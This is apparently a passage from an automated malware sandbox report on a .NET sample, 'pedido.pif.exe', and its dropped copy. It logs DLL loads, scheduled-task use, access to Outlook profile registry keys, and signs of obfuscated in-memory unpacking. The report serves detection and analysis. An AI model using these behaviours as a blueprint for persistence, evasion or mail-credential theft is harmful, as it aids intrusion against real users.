Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\pedido.pif.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: pedido.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: pedido.pif.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: pedido.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: AAjd.pdb source: pedido.pif.exe, RePUtenbQjvc.exe.0.dr
Source:	Binary string: AAjd.pdbSHA256 source: pedido.pif.exe, RePUtenbQjvc.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: pedido.pif.exe, MainForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: pedido.pif.exe, MainForm.cs	.Net Code: InitializeComponent
Source: RePUtenbQjvc.exe.0.dr, MainForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: RePUtenbQjvc.exe.0.dr, MainForm.cs	.Net Code: InitializeComponent
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, hSo7DU79QtQa4qbSOT.cs	.Net Code: V3YNcjLGX9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.pedido.pif.exe.41b0b90.2.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.pedido.pif.exe.73e0000.4.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	.Net Code: V3YNcjLGX9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, hSo7DU79QtQa4qbSOT.cs	.Net Code: V3YNcjLGX9 System.Reflection.Assembly.Load(byte[])
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	.Net Code: V3YNcjLGX9 System.Reflection.Assembly.Load(byte[])

Source: pedido.pif.exe

Static PE information: 0x97D67C86 [Wed Sep 21 23:36:38 2050 UTC]

Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_012FFF70 push eax; retf	0_2_012FFF71
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_012424B9 push 8BFFFFFFh; retf	7_2_012424BF
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EA67 push es; ret	12_2_0673EA68
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EAFF push es; ret	12_2_0673EB00
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EB94 push es; ret	12_2_0673EB98
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EB87 push es; ret	12_2_0673EB88
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EB8F push es; ret	12_2_0673EB90
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EB0B push es; retf 73E7h	12_2_0673EDE4

Source: pedido.pif.exe	Static PE information: section name: .text entropy: 7.914119368917141
Source: RePUtenbQjvc.exe.0.dr	Static PE information: section name: .text entropy: 7.914119368917141

Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, PqX2Agmn9gUlCawFw9v.cs	High entropy of concatenated method names: 'gyKOsU4wx9', 'oC0OjtueeQ', 'XcPOc5tZQa', 'eUMOIriOXW', 'UkYOSrleaa', 'oKVO0pdWHd', 'Cx9OuFgYO8', 'j8nOm4FCyQ', 'xqdOBIk4RC', 'roxOX1BTgD'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, HnYtyupvN2d2d2Y4iF.cs	High entropy of concatenated method names: 'ahTAnKYn4N', 'KmYArVoL0a', 'Q7aKhOgAQx', 'aewKdFcxji', 's3LA983WbX', 'lKaA4rcLII', 'i09ACLEeG4', 'rHlA1jnVgJ', 'qSvA83BapU', 't6GAin8c1e'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, AlLU2bKMQbLPhlGcET.cs	High entropy of concatenated method names: 'AMGdRKouxg', 'd8VdLqCrSb', 'MmGdVIkdkf', 'dDtdbd7QNF', 'DiEd5AaoFU', 'UhKde4jyR8', 'qQb5gFGRudCgJF23bA', 'mOUhLEXyqtEhkePN82', 'vXEdd44qJt', 'd1tdZ3Z3wt'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, tfOxUKvFmSik47EEqD.cs	High entropy of concatenated method names: 's0p8r4B0hkKjjZ7wu00', 'Ux8PcrBlSbiHAJwmeDn', 'owfaKcbC7Q', 'zKuaO9FeCH', 'dW7aPDQOoF', 'VgpwLXBrDvQKT7D76Ih', 'BfJRffBeEY8Agy8exbL', 'rgIIUBBvPfC2ZuOggj6'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, QKGhpmaUoiIi9veP2o.cs	High entropy of concatenated method names: 'fyfciYgmb', 'LZIIR624Q', 'yxL0ywixo', 'm5LuCDsY8', 'HgoBjhxNJ', 'gHdXD6brw', 'er89PkgjPSm8OaHogc', 'cB2uTbYKRH2tsvUxML', 'i6FK86h4W', 'Y8SP2a5ok'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, uq9onE888d5vdViJND.cs	High entropy of concatenated method names: 'RWHKvrKAsu', 'A5MKUXhw0E', 'uDxKwCAYSq', 'd5WKF9EFk3', 'mpcK1YbtC7', 'MtHKDKKc92', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	High entropy of concatenated method names: 'g92f1d5Zl2', 'a1Ff8pQghh', 'HIyfisgp3V', 'dWQf3WwXgd', 'EXffqRpBET', 'V2GfQWg2jI', 'XbgfYZfYPv', 'oDefnN9kxS', 'WyHfTrcXk5', 'jYJfruCtxo'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, q2lAhFuU6UQT8Q8l4a.cs	High entropy of concatenated method names: 'VoaxIUyxbc', 'gPYx00vHnh', 'S01xmaFIuX', 'FlIxB2XNcj', 'mcQx52hRsX', 'OIcxeXPIkg', 'YAVxAUSEVR', 'GPkxKkO23c', 'AFhxO21Gea', 'B1mxPJkv9m'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, eqTLaKq5HbO5sCk6BR.cs	High entropy of concatenated method names: 'Dispose', 'ps2dTQL0YR', 'yNKyUIVy5m', 'VJbkkDLEy7', 'Vnqdr0Q2s6', 'n4MdzOhRsm', 'ProcessDialogKey', 'a7lyhLcxDT', 'VXOydQvGxf', 'Ea1yy7mhJG'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, vvHIQoBLPa3JOJJtat.cs	High entropy of concatenated method names: 'xoMRg8D6kV', 'bDfRxCJx9Q', 'pZeRaYWwJv', 'tSSarNv5Tk', 'Y9pazjFJOe', 'qpORhiSdPV', 'GgmRdfvNkf', 'FZJRyf0fg6', 'dBlRZdynSr', 'HGJRNQyJ2w'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, XoH4EamEFPmGpLFCooL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MVAP10gYdY', 's5MP8hDw9j', 'HnRPiWodYK', 'ytZP3IYMaN', 'K9KPq2we0H', 'PgrPQmcHqW', 'qUbPY1oDi6'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, GgavLlcAI15g8DxanL.cs	High entropy of concatenated method names: 'irwKgIsyKL', 'CAnKfQiNSE', 'fcfKxVUbuV', 'YycKWEYVA0', 'U0pKaocij4', 'aLxKRJD6mD', 'k1EKLutv8V', 'qZZKJQe2xR', 'pEJKV9NTk8', 'DPiKbqqVfG'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, iV5iJSxTY8sWXXCO3f.cs	High entropy of concatenated method names: 'S3aRsdHpCo', 'XcyRjc2c6R', 'e9iRcdkAYS', 'S0JRIATUKN', 'vJmRS7Zvyc', 'cH5R0Uq1hH', 'nPsRubnTUJ', 'WmsRmN45yD', 'PB5RB0sHJD', 'GZoRXOhi6F'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, JhHOt8DnGrQuLJ8n9u.cs	High entropy of concatenated method names: 'R2nHmnUBJL', 'GCDHB6ZCxI', 'c7JHvmJ771', 'zHFHUvB6T3', 'TrKHFT374m', 'X3OHDJ3aVk', 'I23H7993J6', 'sLsHGxXaRM', 'b4oH2fM5Z1', 'UQnH9258SH'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, BImm2IoOKhF5JhaDgH.cs	High entropy of concatenated method names: 'ToString', 'hIke9JXI7n', 's9JeUhmjqJ', 'WRhewuyJcs', 'RVEeFIkeaK', 's6ReDNYH8L', 'qrWe6Z8BDY', 'v5Ze7ZNk4b', 'DmMeGpyMVl', 'loNeo0bvT2'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, zTAyvnwkcV8ErcT59j.cs	High entropy of concatenated method names: 'wVdaExBaFS', 'XqLafeOwST', 'OK2aW27eWE', 'okQaRCuKcq', 'uSpaL8xKwq', 'NbmWqGOSnk', 'g9UWQqPDWm', 'o0pWYVThJL', 'aB1Wn5MueQ', 'yfrWTEmGQY'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, lDk7ZeyVj4TwGCniAX.cs	High entropy of concatenated method names: 'I0TAVvOcRl', 'uGeAbgmvOp', 'ToString', 'GdoAgkfacN', 'LCRAf6Jl4K', 'i5UAxUHvMH', 'tElAWmaWeV', 'PZXAaBfLeD', 'UoDARXUSPt', 'ftoALuvAK6'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, SR4cgeMQHouYZ3AdeL.cs	High entropy of concatenated method names: 'LNFOdmkDn1', 'w6eOZlDG7r', 'OLSON4t6Ke', 'n7qOgxx6S1', 'SanOfKXPLe', 'IE6OWOcHn5', 'TPvOa6JkQX', 'R8fKYTjLyR', 'TjiKn62pRV', 'hatKT4xYAB'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, hSo7DU79QtQa4qbSOT.cs	High entropy of concatenated method names: 'kS4ZEUIl0c', 'V6tZgaA6st', 'CvEZftDEHk', 'IPEZxvQCEv', 'NphZWauWu0', 'e2cZa99brN', 'rWnZRlC7Qd', 'y7jZLo4uY3', 'qWMZJXOOEy', 'RgdZV4jqGi'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, u3kahR25akmCeVZvVN.cs	High entropy of concatenated method names: 'iXbWSITCll', 'SW3WuaPOXg', 'xFpxwVtgGW', 'R5ExF46BkY', 'XguxD7jh1h', 'CMUx65Xg5g', 'nj3x7b4IEy', 'mDqxGOL6Jq', 'bqWxoRB62q', 'hAFx2A5w39'
Source: 0.2.pedido.pif.exe.a620000.5.raw.unpack, cmhDflYdAI3Km3wrTO.cs	High entropy of concatenated method names: 'vPL52MANmh', 'mUr54KPx9V', 'O5L51xH4Wj', 'BXl58NJwl9', 'h7x5UGcfGZ', 'FAo5wO4wGB', 'tEh5Ffj283', 'CLt5DK9iKM', 'aJu56FqPuA', 'soA579YUsb'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, PqX2Agmn9gUlCawFw9v.cs	High entropy of concatenated method names: 'gyKOsU4wx9', 'oC0OjtueeQ', 'XcPOc5tZQa', 'eUMOIriOXW', 'UkYOSrleaa', 'oKVO0pdWHd', 'Cx9OuFgYO8', 'j8nOm4FCyQ', 'xqdOBIk4RC', 'roxOX1BTgD'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, HnYtyupvN2d2d2Y4iF.cs	High entropy of concatenated method names: 'ahTAnKYn4N', 'KmYArVoL0a', 'Q7aKhOgAQx', 'aewKdFcxji', 's3LA983WbX', 'lKaA4rcLII', 'i09ACLEeG4', 'rHlA1jnVgJ', 'qSvA83BapU', 't6GAin8c1e'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, AlLU2bKMQbLPhlGcET.cs	High entropy of concatenated method names: 'AMGdRKouxg', 'd8VdLqCrSb', 'MmGdVIkdkf', 'dDtdbd7QNF', 'DiEd5AaoFU', 'UhKde4jyR8', 'qQb5gFGRudCgJF23bA', 'mOUhLEXyqtEhkePN82', 'vXEdd44qJt', 'd1tdZ3Z3wt'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, tfOxUKvFmSik47EEqD.cs	High entropy of concatenated method names: 's0p8r4B0hkKjjZ7wu00', 'Ux8PcrBlSbiHAJwmeDn', 'owfaKcbC7Q', 'zKuaO9FeCH', 'dW7aPDQOoF', 'VgpwLXBrDvQKT7D76Ih', 'BfJRffBeEY8Agy8exbL', 'rgIIUBBvPfC2ZuOggj6'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, QKGhpmaUoiIi9veP2o.cs	High entropy of concatenated method names: 'fyfciYgmb', 'LZIIR624Q', 'yxL0ywixo', 'm5LuCDsY8', 'HgoBjhxNJ', 'gHdXD6brw', 'er89PkgjPSm8OaHogc', 'cB2uTbYKRH2tsvUxML', 'i6FK86h4W', 'Y8SP2a5ok'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, uq9onE888d5vdViJND.cs	High entropy of concatenated method names: 'RWHKvrKAsu', 'A5MKUXhw0E', 'uDxKwCAYSq', 'd5WKF9EFk3', 'mpcK1YbtC7', 'MtHKDKKc92', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	High entropy of concatenated method names: 'g92f1d5Zl2', 'a1Ff8pQghh', 'HIyfisgp3V', 'dWQf3WwXgd', 'EXffqRpBET', 'V2GfQWg2jI', 'XbgfYZfYPv', 'oDefnN9kxS', 'WyHfTrcXk5', 'jYJfruCtxo'
